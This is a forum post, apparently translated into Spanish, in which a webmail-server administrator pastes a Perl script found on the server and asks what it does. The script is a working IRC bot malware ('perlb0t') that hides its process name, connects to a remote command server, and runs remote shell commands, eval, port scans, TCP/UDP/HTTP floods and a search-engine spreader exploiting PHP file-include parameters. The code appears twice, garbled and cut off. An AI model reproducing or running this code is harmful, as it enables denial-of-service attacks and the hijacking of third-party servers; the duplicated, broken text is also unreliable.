¿Se le ocurrió algo en nuestro servidor de correo web, alguna idea?

Navega tus respuestas
3

Así que esto fue rebotando en nuestro servidor de correo web durante los últimos dos días, me lo llevé a casa hoy para revisarlo. ¿Alguna idea sobre lo que hace / intenta hacer? He estado mirando a través y apreciaría otro par de ojos en él. 

 #!/usr/bin/perl

 system("kill -9 'ps ax |grep /usr/sbin/apache/asterisks |grep -v grep|awk '{print $1;}''");

 my $processo = '/usr/sbin/apache/asterisks';


 my @titi = ("index.php?page=","main.php?page=","index.php?p=","index.php?x=","main.php?p=","index.php?inc=","index.php?frame=","main.php?x=","index.php?path=","index.php?include=","main.php?path=","index.php?file=","main.php?x=",
 "default.php?page=",
 "index.php?open=",
 "index.php?pagina=",
 "index.php?pg=",
 "index.php?pag=",
 "index.php?content=",
 "index.php?cont=",
 "index.php?c=",
 "index.php?x=",
 "index.php?cat=",
 "index.php?site=",
 "index.php?con=",
 "index.php?action=",
 "index.php?do=",
 "index2.php?x=",
 "index2.php?content=",
 "template.php?pagina=","index.php?load=");

 my $goni = $titi[rand scalar @titi];

 my $linas_max='2';
 my $sleep='5';
 my @adms=("ssd","mario","root");
 my @hostauth=("localhost");
 my @canais=("#rnd");
 chop (my $nick = 'uname');
 my $ircname ='linux';
 chop (my $realname = 'uname -r');
 $servidor='403.404.mn' unless $servidor;
 my $porta='8080';
 my $VERSAO = '0.5';
 $SIG{'INT'} = 'IGNORE';
 $SIG{'HUP'} = 'IGNORE';
 $SIG{'TERM'} = 'IGNORE';
 $SIG{'CHLD'} = 'IGNORE';
 $SIG{'PS'} = 'IGNORE';
 use IO::Socket;
 use Socket;
 use IO::Select;
 chdir("/");
 $servidor="$ARGV[0]" if $ARGV[0];
 $0="$processo"."
 #!/usr/bin/perl

 system("kill -9 'ps ax |grep /usr/sbin/apache/asterisks |grep -v grep|awk '{print $1;}''");

 my $processo = '/usr/sbin/apache/asterisks';


 my @titi = ("index.php?page=","main.php?page=","index.php?p=","index.php?x=","main.php?p=","index.php?inc=","index.php?frame=","main.php?x=","index.php?path=","index.php?include=","main.php?path=","index.php?file=","main.php?x=",
 "default.php?page=",
 "index.php?open=",
 "index.php?pagina=",
 "index.php?pg=",
 "index.php?pag=",
 "index.php?content=",
 "index.php?cont=",
 "index.php?c=",
 "index.php?x=",
 "index.php?cat=",
 "index.php?site=",
 "index.php?con=",
 "index.php?action=",
 "index.php?do=",
 "index2.php?x=",
 "index2.php?content=",
 "template.php?pagina=","index.php?load=");

 my $goni = $titi[rand scalar @titi];

 my $linas_max='2';
 my $sleep='5';
 my @adms=("ssd","mario","root");
 my @hostauth=("localhost");
 my @canais=("#rnd");
 chop (my $nick = 'uname');
 my $ircname ='linux';
 chop (my $realname = 'uname -r');
 $servidor='403.404.mn' unless $servidor;
 my $porta='8080';
 my $VERSAO = '0.5';
 $SIG{'INT'} = 'IGNORE';
 $SIG{'HUP'} = 'IGNORE';
 $SIG{'TERM'} = 'IGNORE';
 $SIG{'CHLD'} = 'IGNORE';
 $SIG{'PS'} = 'IGNORE';
 use IO::Socket;
 use Socket;
 use IO::Select;
 chdir("/");
 $servidor="$ARGV[0]" if $ARGV[0];
 $0="$processo"."%pre%"x16;;
 my $pid=fork;
 exit if $pid;
 die "Problema com o fork: $!" unless defined($pid);

 our %irc_servers;
 our %DCC;
 my $dcc_sel = new IO::Select->new();

 $sel_cliente = IO::Select->new();
 sub sendraw {
   if ($#_ == '1') {
     my $socket = $_[0];
     print $socket "$_[1]\n";
   } else {
       print $IRC_cur_socket "$_[0]\n";
   }
 }

 sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
      $IRC_cur_socket = $IRC_socket;

      $IRC_socket->autoflush(1);
      $sel_cliente->add($IRC_socket);

      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
      nick("$meunick");
      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
      sleep 1;
    }
 }
 my $line_temp;
 while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
      $IRC_cur_socket = $fh;
      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
      $nread = sysread($fh, $msg, 4096);
      if ($nread == 0) {
         $sel_cliente->remove($fh);
         $fh->close;
         delete($irc_servers{$fh});
      }
      @lines = split (/\n/, $msg);

      for(my $c=0; $c<= $#lines; $c++) {
        $line = $lines[$c];
        $line=$line_temp.$line if ($line_temp);
        $line_temp='';
        $line =~ s/\r$//;
        unless ($c == $#lines) {
          parse("$line");
        } else {
            if ($#lines == 0) {
              parse("$line");
            } elsif ($lines[$c] =~ /\r$/) {
                parse("$line");
            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                parse("$line");
            } else {
                $line_temp = $line;
            }
        }
       }
    }
 }

 sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
      sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^%pre%1VERSION%pre%1$/) {
          notice("$pn", "%pre%1VERSION mIRC v6.16 Khaled Mardam-Bey%pre%1");
        }
        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
          if ($onde eq "$meunick"){
            shell("$pn", "$args");
          }
          if ($args =~ /^(\Q$meunick\E|\!a)\s+(.*)/ ) {
             my $natrix = $1;
             my $arg = $2;
             if ($arg =~ /^\!(.*)/) {
               ircase("$pn","$onde","$1") unless ($natrix eq "!root" and $arg =~ /^\!nick/);
             } elsif ($arg =~ /^\@(.*)/) {
                 $ondep = $onde;
                 $ondep = $pn if $onde eq $meunick;
                 bfunc("$ondep","$1");
             } else {
                 shell("$onde", "$arg");
             }
          }
        }
  }
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($meunick)) {
          $meunick=$4;
          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$meunick-".int rand(999999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $meunick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach my $canal (@canais) {
          sendraw("JOIN $canal ddosit");
        }
    }
 }


 sub bfunc {
   my $printl = $_[0];
   my $funcarg = $_[1];
   if (my $pid = fork) {
      waitpid($pid, 0);
   } else {
       if (fork) {
          exit;
        } else {
            if ($funcarg =~ /^portscan (.*)/) {
              my $hostip="$1";
              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
              my (@aberta, %porta_banner);
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[SCAN]%pre%2 Scanning ".$1." for open ports.");
              foreach my $porta (@portas)  {
                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                 if ($scansock) {
                    push (@aberta, $porta);
                    $scansock->close;
                 }
              }

              if (@aberta) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[SCAN]%pre%2 Open port(s): @aberta");
              } else {
                sendraw($IRC_cur_socket,"PRIVMSG $printl :%pre%2[SCAN]%pre%2 No open ports found");
              }
            }
            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[TCP]%pre%2 Attacking ".$1.":".$2." for ".$3." seconds.");
       my $itime = time;
       my ($cur_time);
              $cur_time = time - $itime;
       while ($3>$cur_time){
              $cur_time = time - $itime;
       &tcpflooder("$1","$2","$3");
              }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[TCP]%pre%2 Attack done ".$1.":".$2.".");
            }
     if ($funcarg =~ /^version/) {
   sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[VERSION]%pre%2 perlb0t ver ".$VERSAO);
   }
            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[GOOGLE]%pre%2 Scanning for unpatched mambo for ".$1." seconds.");
       srand;
       my $itime = time;
       my ($cur_time);
       my ($exploited);
       $boturl=$2;
              $cur_time = time - $itime;$exploited = 0;
   while($1>$cur_time){
       $cur_time = time - $itime;
       @urls=fetch();
    foreach $url (@urls) {
    $cur_time = time - $itime;
    my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

    $url =$path."/$goni$boturl" ;




    $page = http_query($url);
    $exploited = $exploited + 1;
       }
   }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[GOOGLE]%pre%2 Exploited ".$exploited." boxes in ".$1." seconds.");
            }
            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[HTTP]%pre%2 Attacking ".$1.":80 for ".$2." seconds.");
       my $itime = time;
       my ($cur_time);
              $cur_time = time - $itime;
       while ($2>$cur_time){
              $cur_time = time - $itime;
       my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
       close($socket);
              }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[HTTP]%pre%2 Attacking done ".$1.".");
            }
            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[UDP]%pre%2 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
              $dtime = 1 if $dtime == 0;
              my %bytes;
              $bytes{igmp} = $2 * $pacotes{igmp};
              $bytes{icmp} = $2 * $pacotes{icmp};
              $bytes{o} = $2 * $pacotes{o};
              $bytes{udp} = $2 * $pacotes{udp};
              $bytes{tcp} = $2 * $pacotes{tcp};
              sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[UDP]%pre%2 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
            }
            exit;
        }
   }
 }

 sub ircase {
   my ($kem, $printl, $case) = @_;

   if ($case =~ /^join (.*)/) {
      j("$1");
    }

 if ($case =~ /^refresh (.*)/) {
 my $goni = $titi[rand scalar @titi];
  }

    if ($case =~ /^part (.*)/) {
       p("$1");
    }
    if ($case =~ /^rejoin\s+(.*)/) {
       my $chan = $1;
       if ($chan =~ /^(\d+) (.*)/) {
         for (my $ca = 1; $ca <= $1; $ca++ ) {
           p("$2");
           j("$2");
         }
       } else {
           p("$chan");
           j("$chan");
       }
    }
    if ($case =~ /^op/) {
       op("$printl", "$kem") if $case eq "op";
       my $oarg = substr($case, 3);
       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^deop/) {
       deop("$printl", "$kem") if $case eq "deop";
       my $oarg = substr($case, 5);
       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^msg\s+(\S+) (.*)/) {
       msg("$1", "$2");
    }
    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
       for (my $cf = 1; $cf <= $1; $cf++) {
         msg("$2", "$3");
       }
    }
    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
       ctcp("$1", "$2");
    }
    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
       for (my $cf = 1; $cf <= $1; $cf++) {
         ctcp("$2", "$3");
       }
    }
    if ($case =~ /^nick (.*)/) {
       nick("$1");
    }
    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
        conectar("$2", "$1", 6667);
    }
    if ($case =~ /^raw (.*)/) {
       sendraw("$1");
    }
    if ($case =~ /^eval (.*)/) {
      eval "$1";
    }
 }

 sub shell {
   my $printl=$_[0];
   my $comando=$_[1];
   if ($comando =~ /cd (.*)/) {
     chdir("$1") || msg("$printl", "No such file or directory");
     return;
   }
   elsif ($pid = fork) {
      waitpid($pid, 0);
   } else {

       if (fork) {
          exit;
        } else {
            my @resp='$comando 2>&1 3>&1';
            my $c=0;
            foreach my $linha (@resp) {
              $c++;
              chop $linha;
              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
              if ($c == "$linas_max") {
                $c=0;
                sleep $sleep;
              }
            }
            exit;
        }
   }
 }

 sub tcpflooder {
  my $itime = time;
  my ($cur_time);
  my ($ia,$pa,$proto,$j,$l,$t);
  $ia=inet_aton($_[0]);
  $pa=sockaddr_in($_[1],$ia);
  $ftime=$_[2];
  $proto=getprotobyname('tcp');
  $j=0;$l=0;
  $cur_time = time - $itime;
  while ($l<1000){
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   $t="SOCK$l";
   socket($t,PF_INET,SOCK_STREAM,$proto);
   connect($t,$pa)||$j--;
   $j++;$l++;
  }
  $l=0;
  while ($l<1000){
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   $t="SOCK$l";
   shutdown($t,2);
   $l++;
  }
 }

 sub udpflooder {
   my $iaddr = inet_aton($_[0]);
   my $msg = 'A' x $_[1];
   my $ftime = $_[2];
   my $cp = 0;
   my (%pacotes);
   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
   return(undef) if $cp == 4;
   my $itime = time;
   my ($cur_time);
   while ( 1 ) {
      for (my $porta = 1; $porta <= 65000; $porta++) {
        $cur_time = time - $itime;
        last if $cur_time >= $ftime;
        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

        for (my $pc = 3; $pc <= 255;$pc++) {
          next if $pc == 6;
          $cur_time = time - $itime;
          last if $cur_time >= $ftime;
          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
        }
      }
      last if $cur_time >= $ftime;
   }
   return($cur_time, %pacotes);
 }

 sub ctcp {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :%pre%1$_[1]%pre%1");
 }
 sub msg {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :$_[1]");
 }
 sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
 }
 sub op {
    return unless $#_ == 1;
    sendraw("MODE $_[0] +o $_[1]");
 }
 sub deop {
    return unless $#_ == 1;
    sendraw("MODE $_[0] -o $_[1]");
 }
 sub j { &join(@_); }
 sub join {
    return unless $#_ == 0;
    sendraw("JOIN $_[0]");
 }
 sub p { part(@_); }
 sub part {
   sendraw("PART $_[0]");
 }
 sub nick {
   return unless $#_ == 0;
   sendraw("NICK $_[0]");
 }
 sub quit {
   sendraw("QUIT :$_[0]");
 }

 # Spreader
 # this 'spreader' code isnot mine, i dont know who coded it.
 # update: well, i just fix0red this shit a bit.
 #

 sub fetch(){
     my $rnd=(int(rand(9999)));
     my $n= 80;
     if ($rnd<5000) { $n<<=1;}
     my $s= (int(rand(5)) * $n);

 my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
   "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
   "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
   "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
   "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
   "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
   "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
   "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
   "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
   "vu","vn","ye","yu","cd","zm","zw","");
 my @str;

 foreach $dom  (@dominios)
 {
  push (@str,"allinurl:%22".$dom."/".$goni."%22");
 }

     my $query="www.google.com/search?q=";
     $query.=$str[(rand(scalar(@str)))];
     $query.="&num=$n&start=$s";


     my @lst=();
     my $page = http_query($query);
     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  if ($1 !~ m/google|cache|translate/){
      push (@lst,$1);
  }
     }
     return (@lst);
 }


 sub http_query($){
     my ($url) = @_;
     my $host=$url;
     my $query=$url;

     my $page="";
     $host =~ s/href=\"?http:\/\///;
     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
     $query =~s/$host//;
     if ($query eq "") {$query="/";};
     eval {
  local $SIG{ALRM} = sub { die "1";};
  alarm 10;
  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  my @r = <$sock>;
  $page="@r";
  alarm 0;
  close($sock);
     };
     return $page;

 }

"x16;;
 my $pid=fork;
 exit if $pid;
 die "Problema com o fork: $!" unless defined($pid);

 our %irc_servers;
 our %DCC;
 my $dcc_sel = new IO::Select->new();

 $sel_cliente = IO::Select->new();
 sub sendraw {
   if ($#_ == '1') {
     my $socket = $_[0];
     print $socket "$_[1]\n";
   } else {
       print $IRC_cur_socket "$_[0]\n";
   }
 }

 sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
      $IRC_cur_socket = $IRC_socket;

      $IRC_socket->autoflush(1);
      $sel_cliente->add($IRC_socket);

      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
      nick("$meunick");
      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
      sleep 1;
    }
 }
 my $line_temp;
 while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
      $IRC_cur_socket = $fh;
      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
      $nread = sysread($fh, $msg, 4096);
      if ($nread == 0) {
         $sel_cliente->remove($fh);
         $fh->close;
         delete($irc_servers{$fh});
      }
      @lines = split (/\n/, $msg);

      for(my $c=0; $c<= $#lines; $c++) {
        $line = $lines[$c];
        $line=$line_temp.$line if ($line_temp);
        $line_temp='';
        $line =~ s/\r$//;
        unless ($c == $#lines) {
          parse("$line");
        } else {
            if ($#lines == 0) {
              parse("$line");
            } elsif ($lines[$c] =~ /\r$/) {
                parse("$line");
            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                parse("$line");
            } else {
                $line_temp = $line;
            }
        }
       }
    }
 }

 sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
      sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^%pre%1VERSION%pre%1$/) {
          notice("$pn", "%pre%1VERSION mIRC v6.16 Khaled Mardam-Bey%pre%1");
        }
        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
          if ($onde eq "$meunick"){
            shell("$pn", "$args");
          }
          if ($args =~ /^(\Q$meunick\E|\!a)\s+(.*)/ ) {
             my $natrix = $1;
             my $arg = $2;
             if ($arg =~ /^\!(.*)/) {
               ircase("$pn","$onde","$1") unless ($natrix eq "!root" and $arg =~ /^\!nick/);
             } elsif ($arg =~ /^\@(.*)/) {
                 $ondep = $onde;
                 $ondep = $pn if $onde eq $meunick;
                 bfunc("$ondep","$1");
             } else {
                 shell("$onde", "$arg");
             }
          }
        }
  }
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($meunick)) {
          $meunick=$4;
          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$meunick-".int rand(999999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $meunick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach my $canal (@canais) {
          sendraw("JOIN $canal ddosit");
        }
    }
 }


 sub bfunc {
   my $printl = $_[0];
   my $funcarg = $_[1];
   if (my $pid = fork) {
      waitpid($pid, 0);
   } else {
       if (fork) {
          exit;
        } else {
            if ($funcarg =~ /^portscan (.*)/) {
              my $hostip="$1";
              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
              my (@aberta, %porta_banner);
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[SCAN]%pre%2 Scanning ".$1." for open ports.");
              foreach my $porta (@portas)  {
                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                 if ($scansock) {
                    push (@aberta, $porta);
                    $scansock->close;
                 }
              }

              if (@aberta) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[SCAN]%pre%2 Open port(s): @aberta");
              } else {
                sendraw($IRC_cur_socket,"PRIVMSG $printl :%pre%2[SCAN]%pre%2 No open ports found");
              }
            }
            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[TCP]%pre%2 Attacking ".$1.":".$2." for ".$3." seconds.");
       my $itime = time;
       my ($cur_time);
              $cur_time = time - $itime;
       while ($3>$cur_time){
              $cur_time = time - $itime;
       &tcpflooder("$1","$2","$3");
              }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[TCP]%pre%2 Attack done ".$1.":".$2.".");
            }
     if ($funcarg =~ /^version/) {
   sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[VERSION]%pre%2 perlb0t ver ".$VERSAO);
   }
            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[GOOGLE]%pre%2 Scanning for unpatched mambo for ".$1." seconds.");
       srand;
       my $itime = time;
       my ($cur_time);
       my ($exploited);
       $boturl=$2;
              $cur_time = time - $itime;$exploited = 0;
   while($1>$cur_time){
       $cur_time = time - $itime;
       @urls=fetch();
    foreach $url (@urls) {
    $cur_time = time - $itime;
    my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;

    $url =$path."/$goni$boturl" ;




    $page = http_query($url);
    $exploited = $exploited + 1;
       }
   }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[GOOGLE]%pre%2 Exploited ".$exploited." boxes in ".$1." seconds.");
            }
            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[HTTP]%pre%2 Attacking ".$1.":80 for ".$2." seconds.");
       my $itime = time;
       my ($cur_time);
              $cur_time = time - $itime;
       while ($2>$cur_time){
              $cur_time = time - $itime;
       my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
       close($socket);
              }
       sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[HTTP]%pre%2 Attacking done ".$1.".");
            }
            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[UDP]%pre%2 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
              $dtime = 1 if $dtime == 0;
              my %bytes;
              $bytes{igmp} = $2 * $pacotes{igmp};
              $bytes{icmp} = $2 * $pacotes{icmp};
              $bytes{o} = $2 * $pacotes{o};
              $bytes{udp} = $2 * $pacotes{udp};
              $bytes{tcp} = $2 * $pacotes{tcp};
              sendraw($IRC_cur_socket, "PRIVMSG $printl :%pre%2[UDP]%pre%2 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
            }
            exit;
        }
   }
 }

 sub ircase {
   my ($kem, $printl, $case) = @_;

   if ($case =~ /^join (.*)/) {
      j("$1");
    }

 if ($case =~ /^refresh (.*)/) {
 my $goni = $titi[rand scalar @titi];
  }

    if ($case =~ /^part (.*)/) {
       p("$1");
    }
    if ($case =~ /^rejoin\s+(.*)/) {
       my $chan = $1;
       if ($chan =~ /^(\d+) (.*)/) {
         for (my $ca = 1; $ca <= $1; $ca++ ) {
           p("$2");
           j("$2");
         }
       } else {
           p("$chan");
           j("$chan");
       }
    }
    if ($case =~ /^op/) {
       op("$printl", "$kem") if $case eq "op";
       my $oarg = substr($case, 3);
       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^deop/) {
       deop("$printl", "$kem") if $case eq "deop";
       my $oarg = substr($case, 5);
       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^msg\s+(\S+) (.*)/) {
       msg("$1", "$2");
    }
    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
       for (my $cf = 1; $cf <= $1; $cf++) {
         msg("$2", "$3");
       }
    }
    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
       ctcp("$1", "$2");
    }
    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
       for (my $cf = 1; $cf <= $1; $cf++) {
         ctcp("$2", "$3");
       }
    }
    if ($case =~ /^nick (.*)/) {
       nick("$1");
    }
    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
        conectar("$2", "$1", 6667);
    }
    if ($case =~ /^raw (.*)/) {
       sendraw("$1");
    }
    if ($case =~ /^eval (.*)/) {
      eval "$1";
    }
 }

 sub shell {
   my $printl=$_[0];
   my $comando=$_[1];
   if ($comando =~ /cd (.*)/) {
     chdir("$1") || msg("$printl", "No such file or directory");
     return;
   }
   elsif ($pid = fork) {
      waitpid($pid, 0);
   } else {

       if (fork) {
          exit;
        } else {
            my @resp='$comando 2>&1 3>&1';
            my $c=0;
            foreach my $linha (@resp) {
              $c++;
              chop $linha;
              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
              if ($c == "$linas_max") {
                $c=0;
                sleep $sleep;
              }
            }
            exit;
        }
   }
 }

 sub tcpflooder {
  my $itime = time;
  my ($cur_time);
  my ($ia,$pa,$proto,$j,$l,$t);
  $ia=inet_aton($_[0]);
  $pa=sockaddr_in($_[1],$ia);
  $ftime=$_[2];
  $proto=getprotobyname('tcp');
  $j=0;$l=0;
